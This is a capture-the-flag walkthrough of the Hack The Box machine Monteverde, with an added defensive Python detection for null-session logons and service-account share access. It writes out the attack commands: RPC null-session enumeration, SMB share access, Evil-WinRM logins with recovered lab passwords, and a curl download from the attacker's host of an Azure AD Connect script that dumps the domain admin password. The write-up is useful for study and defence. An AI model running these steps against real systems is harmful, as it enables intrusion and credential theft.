Monteverde - Hack The Box
Summary
Monteverde is a medium-difficulty Windows machine on Hack The Box. For the user part, we enumerate the RPC service to obtain some usernames. With one of those usernames, we connect to the SMB shares and find a users$ share that contains the first user's credentials. With those valid credentials, we get the user flag. For the root part, we escalate privileges by abusing Azure AD Connect to recover a domain admin password in plaintext. Let's begin.
Service Enumeration
An NMAP scan shows the following (partial) output:
Note: explanation of the command and its flags:
- sC: scan with the default Nmap scripts.
- sV: version detection.
- oA: write the output in all three major formats at once.
#Command: $ nmap -sC -sV -oA nmap 10.10.10.172
Several ports are open. We enumerated the SMB/RPC service with the rpcclient tool, using a null session (empty username, no password):
#Command: $ rpcclient -U "" -N 10.10.10.172
In the above figure, we got some usernames after enumerating RPC.
Gaining User Access
smbclient is a client that is part of the Samba software suite; most readers will already know its basic commands. List the SMB shares with the following command.
#Command: $ smbclient -U SABatchesJobs -L 10.10.10.172
The browse list shows other SMB servers with resources to share on the network.
We connect to the smb shares with the given command below.
#Command: $ smbclient '\\10.10.10.172\users$' -U SABatchesJobs
After gaining access to the users$ share, we found one useful file: azure.xml.
We downloaded this file to our host machine with the mget command.
The azure.xml file gave us the password 4n0therD4y@n0th3r$. With this password, we can log in with the Evil-WinRM tool.
#Command: $ evil-winrm -i 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'
In figure 6, we successfully log in as the mhope user and get the first user flag, which is located in the Desktop folder. Now we move on to privilege escalation.
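As an added defensive example (not part of the original write-up), the following Python detection flags the two user-stage behaviours above in constructed Windows Security events: the null-session logon that `rpcclient -U "" -N` produces (event 4624, Logon Type 3, ANONYMOUS LOGON) and a batch/service account such as SABatchesJobs accessing hidden shares (event 5140) from a host it is not expected on. The sample events, the source addresses, the svc-backup account and the per-account host allow-list are all assumptions.

```python
from collections import defaultdict

# Constructed sample events (not logs captured from the box), pre-parsed into
# the fields a SIEM extracts from Security event 4624 (logon) and event 5140
# (network share object accessed). Source addresses are assumed.
SAMPLE_EVENTS = [
    {"id": 4624, "user": "ANONYMOUS LOGON", "logon_type": 3, "src": "10.10.14.11"},
    {"id": 5140, "user": "SABatchesJobs", "share": "\\\\*\\users$", "src": "10.10.14.11"},
    {"id": 5140, "user": "SABatchesJobs", "share": "\\\\*\\IPC$", "src": "10.10.14.11"},
    {"id": 4624, "user": "mhope", "logon_type": 3, "src": "10.10.14.11"},
    {"id": 4624, "user": "svc-backup", "logon_type": 3, "src": "10.10.10.50"},
    {"id": 4624, "user": "SABatchesJobs", "logon_type": 4, "src": "10.10.10.172"},
]

# Assumed allow-list: batch/service accounts and the only hosts they should
# log on from. SABatchesJobs is the account from the write-up; svc-backup is
# a made-up benign account included to show a non-alerting case.
SERVICE_ACCOUNT_HOSTS = {
    "SABatchesJobs": {"10.10.10.172"},
    "svc-backup": {"10.10.10.50"},
}


def detect(events):
    """Return (rule, user, source, detail) tuples, one per finding."""
    alerts, null_sources = [], set()
    for e in events:
        user, src = e["user"], e["src"]
        # Rule 1: null session. `rpcclient -U "" -N` appears as a network
        # (type 3) logon by ANONYMOUS LOGON; report each source once.
        if e["id"] == 4624 and user == "ANONYMOUS LOGON" and e.get("logon_type") == 3:
            if src not in null_sources:
                null_sources.add(src)
                alerts.append(("null-session", user, src, "logon_type=3"))
        # Rule 2: a service account logging on (4624) or opening a share
        # (5140) from a host outside its allow-list, e.g. a tester's machine.
        allowed = SERVICE_ACCOUNT_HOSTS.get(user)
        if allowed is not None and src not in allowed:
            detail = e.get("share") or "logon_type=%s" % e.get("logon_type")
            alerts.append(("service-account-off-host", user, src, detail))
    return alerts


def sources_by_rule(alerts):
    """Group rule names by source so one host tripping both rules stands out."""
    grouped = defaultdict(set)
    for rule, _user, src, _detail in alerts:
        grouped[src].add(rule)
    return {src: sorted(rules) for src, rules in grouped.items()}
```

Running `detect(SAMPLE_EVENTS)` yields three alerts, all from 10.10.14.11, and `sources_by_rule` shows that single host tripping both rules.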
Privilege Escalation
We see that the current user is a member of the MEGABANK\Azure Admins group. I searched Google for Azure privilege escalation.
#Command: $ whoami /groups
The Azure AD Connect service is responsible for synchronizing objects between the on-premises AD domain and the Azure-based domain. To do this, it needs privileged credentials for the local domain so that it can perform operations such as password synchronization. From the Evil-WinRM session we created a temporary folder and transferred the Azure-ADConnect script into it (curl's -o flag names the output file).
#Command: $ curl https://10.10.14.11:8000/Azure-ADConnect.ps1 -o rohit.ps1
#Command: $ Import-Module ./rohit.ps1
#Command: $ Azure-ADConnect -server 10.10.10.172 -db ADSync
When we run it on a machine that holds the Azure AD Connect database, we get the AD account's credentials in plaintext. For the root flag, we again connect with the Evil-WinRM tool.
#Command: $ evil-winrm -i 10.10.10.172 -u Administrator -p 'd0m@in4dminyeah!'
We successfully log in with the Administrator credentials and get the root flag.
Thanks for reading.
Hack The Box Profile: https://www.hackthebox.eu/profile/116842
Blog: https://medium.com/@princerohit8800